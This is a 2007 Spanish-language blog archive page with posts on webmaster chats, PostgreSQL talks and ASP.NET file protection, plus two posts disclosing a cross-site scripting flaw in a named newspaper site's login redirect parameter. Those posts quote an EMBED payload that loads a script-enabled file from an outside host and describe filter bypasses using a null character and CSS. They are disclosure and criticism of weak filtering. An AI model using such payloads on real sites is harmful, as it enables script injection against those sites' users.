Month: enero 2007

Varios

Chats temáticos de la Asociación Nacional de Webmasters de Perú

Post author By alex
Post date 22 enero 2007

La ANWMP, viene elaborando una serie de

...charlas en que los participantes vengan investigando respecto al tema a tocar. El expositor dará un vistazo a grandes rasgos del tema. Luego vendrá el ciclo de preguntas e intervenciones. Hay que aclarar que la esencia de estas charlas es que todos aprendamos de todos, de allí que si el expositor tiene problemas en responder una pregunta, se pueda ver ayudado por los demás participantes, y si hay temas polémicos podamos resolverlos en consenso.

Si desean colaborar como expositores, puedes contactarse con los organizadores o dejar un comentario en la siguiente dirección: http://www.anwmp.org/node/860.

Comentarios sobre la primera charla (Introducción a Ruby on Rails)

Esta primera charla fue presentada por Rubén Dávila, quien de manera rápida expuso los aspectos relacionados al desarrollo de aplicaciones web con este framework; pero IMHO, hubo algunas inconsistencias -o eso me pareció- probablemente por intentar cubrir demasiados temas en tan poco tiempo.

Si desean leer el log de la charla, puede descargar el fichero desde el sitio de la ANWMP.

Notas finales

Si no tienen planes y el tema tratado es de su interés, les invito a que asistan a la siguiente charla sobre Tiendas Virtuales, este sábado 27 a las 7 p.m. (GMT-5).

Presentaciones sobre PostgreSQL

Post author By alex
Post date 21 enero 2007
1 Comment on Presentaciones sobre PostgreSQL

Para los que quieran aprender un poco más sobre PostgreSQL, puede que las siguientes presentaciones sean de utilidad para quienes usen esta base de datos.

Introducción a PostgreSQL
PostgreSQL para profesionales: instalación, actualizaciones, configuración, mantenimientos de rutina, hardware, replicación.
PostgreSQL avanzado: mejora de rendmiento de consultas, PITR
PostgreSQL Hacking: entorno de desarrollo, arquitectura de PostgreSQL, convenciones, envío de parches, etc.

Fuente: http://lca2007.linux.org.au/Miniconfs/PostgreSQL

.NET ASP.NET Web

Protección de archivos con ASP.NET 2 e IIS 6

Post author By alex
Post date 21 enero 2007
4 Comments on Protección de archivos con ASP.NET 2 e IIS 6

En ciertas ocasiones, es necesario controlar el acceso a los recursos o archivos de nuestra aplicación, bien sea por permitir sólo a usuarios registrados o con la intención de monitorear el número de descargas de éstos.

Todos los archivos relacionados a ASP.NET (aspx, asmx, ashx, asax, etc) son procesados por el runtime de ASP.NET y es por este motivo que se puede especificar que controlador HTTP se hará cargo de un determinado documento, a su vez también están disponibles los mecanismos de autenticación y autorización para éstos.

Seguridad XSS

¿Por qué algunos desarrolladores se complican la vida?

Post author By alex
Post date 20 enero 2007
6 Comments on ¿Por qué algunos desarrolladores se complican la vida?

Esta semana definitivamente no me fue muy bien, primero porque dejé algunas cosas pendientes en el trabajo y segundo porque -como se habrán dado cuenta- no escribí mucho esta semana, pensaba hacerlo a partir del lunes, pero al ver la solución que le dieron al bug mostrado en la entrada anterior, no puedo dejar de comentar acerca de ésta 😉 .

Por alguna extraña razón, siguen permitiendo insertar HTML en la variable backURL, sólo que esta vez se basaron en algunos ejemplos básicos de la popular página que contiene diferentes vectores de ataques XSS, digo esto porque si usamos un ejemplo anterior que funcionaba, ahora ya no lo hace.

Paso a comentar dos ejemplos que funcionan en Internet Explorer (existen otros para otros navegadores):

En la entrada anterior usamos <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> como valor para la variable backURL, con el cual era posible ejecutar javascript, pero si hacemos la prueba en este momento, este valor es descartado por contener la palabra embed. Una forma de saltar esa validación es insertar algo entre esa palabra, pero que ese algo todavía permita ejecutar javascript, si volvemos a nuestra página de referencia :), podemos ver que el caracter nulo (código ASCII 0) sirve para este propósito. Ejm.
Este caso es aún más simple, porque hace uso de CSS -no estandar- para ejecutar javascript. Ejm

Esta lista podría ir creciendo dependiendo de las peculiaridades de cada navegador, lamentablemente los desarrolladores de esa página, usaron una solución compleja e ineficiente para un problema simple de resolver.

Si hay algo que me enseñaron desde mis inicios, es que no sirve corregir un problema en particular -mucho menos si éste depende de otras aplicaciones o componentes, se tiene que cortar el problema de raiz.

Seguridad XSS

XSS (Cross Site Scripting) en elpais.com

Post author By alex
Post date 16 enero 2007
4 Comments on XSS (Cross Site Scripting) en elpais.com

Hace cierto tiempo puse un quiz titulado "cuando los filtros no hacen lo que deberían", en el que preguntaba como explotar la casi nula validación de una variable. Pues bien, ese ejemplo hacía referencia al bug que existe en el sitio web del diario El País de España.

La URL afectada recibe como parámetro la variable backURL, que -supongo- sirve para redireccionar a esa URL una vez hecha la validación de los datos: http://www.elpais.com/clientes2/conectar1.html

Al parecer por la acción de un filtro, esta página envía un error (404) cuando backURL contiene en cualquier ubicación la palabra <script, pero por lo que se ve, los desarrolladores no se dieron cuenta de que existen otros vectores de ataque.

No tengo idea sobre el impacto de este bug en ese sitio, pero lo que está claro es que muchas empresas no le dan demasiada importancia a esto de la seguridad, ya que han pasado aproximadamente 3 meses desde que reporté este problema y hasta el momento ni lo han solucionado, ni he recibido respuesta alguna.